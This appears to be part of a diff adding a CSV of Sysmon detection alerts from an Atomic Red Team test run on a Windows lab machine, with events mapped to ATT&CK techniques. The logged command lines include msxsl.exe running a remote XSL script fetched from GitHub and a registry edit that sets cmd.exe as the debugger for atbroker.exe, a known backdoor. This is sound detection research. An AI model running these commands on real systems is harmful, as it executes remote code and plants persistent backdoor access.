+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1563547856.18299,2019-07-19T18:50:56.182990+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe  process /FORMAT:list ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:56.047770Z"">
+    </TimeCreated>
+    <EventRecordID>3763</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:56.021</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8D0-5D31-0000-0010F3623300</Data>
+    <Data Name=""ProcessId"">7040</Data>
+    <Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">WMI Commandline Utility</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">wmic.exe  process /FORMAT:list</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D8CF-5D31-0000-00109B603300</Data>
+    <Data Name=""ParentProcessId"">5380</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:55.991996Z"">
+    </TimeCreated>
+    <EventRecordID>3762</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:55.978</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8CF-5D31-0000-00109B603300</Data>
+    <Data Name=""ProcessId"">5380</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:55.991996Z"">
+    </TimeCreated>
+    <EventRecordID>3762</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:55.978</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8CF-5D31-0000-00109B603300</Data>
+    <Data Name=""ProcessId"">5380</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547855.991996,2019-07-19T18:50:55.991996+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:53.062635Z"">
+    </TimeCreated>
+    <EventRecordID>3761</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:53.038</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8CD-5D31-0000-001047543300</Data>
+    <Data Name=""ProcessId"">1852</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547853.062635,2019-07-19T18:50:53.062635+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:53.011281Z"">
+    </TimeCreated>
+    <EventRecordID>3760</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:52.989</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8CC-5D31-0000-001038513300</Data>
+    <Data Name=""ProcessId"">948</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547853.011281,2019-07-19T18:50:53.011281+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:50.086593Z"">
+    </TimeCreated>
+    <EventRecordID>3759</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:50.067</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8CA-5D31-0000-0010CF443300</Data>
+    <Data Name=""ProcessId"">6268</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547850.086593,2019-07-19T18:50:50.086593+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:50.046476Z"">
+    </TimeCreated>
+    <EventRecordID>3758</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:50.029</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8CA-5D31-0000-0010DA413300</Data>
+    <Data Name=""ProcessId"">4004</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1563547850.046476,2019-07-19T18:50:50.046476+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ams15s30-in-f4.1e100.net ) , IP ( 172.217.17.132 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:25.376030Z"">
+    </TimeCreated>
+    <EventRecordID>3757</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3400"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Suspicious NetCon</Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:20.871</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ProcessId"">3912</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
+    <Data Name=""SourcePort"">49727</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">172.217.17.132</Data>
+    <Data Name=""DestinationHostname"">ams15s30-in-f4.1e100.net</Data>
+    <Data Name=""DestinationPort"">80</Data>
+    <Data Name=""DestinationPortName"">http</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547825.37603,2019-07-19T18:50:25.376030+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:19.549321Z"">
+    </TimeCreated>
+    <EventRecordID>3756</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:19.533</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8AB-5D31-0000-0010A4D53200</Data>
+    <Data Name=""ProcessId"">1888</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547819.491237,2019-07-19T18:50:19.491237+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:19.467476Z"">
+    </TimeCreated>
+    <EventRecordID>3753</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:19.455</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8AB-5D31-0000-001054D03200</Data>
+    <Data Name=""ProcessId"">6244</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
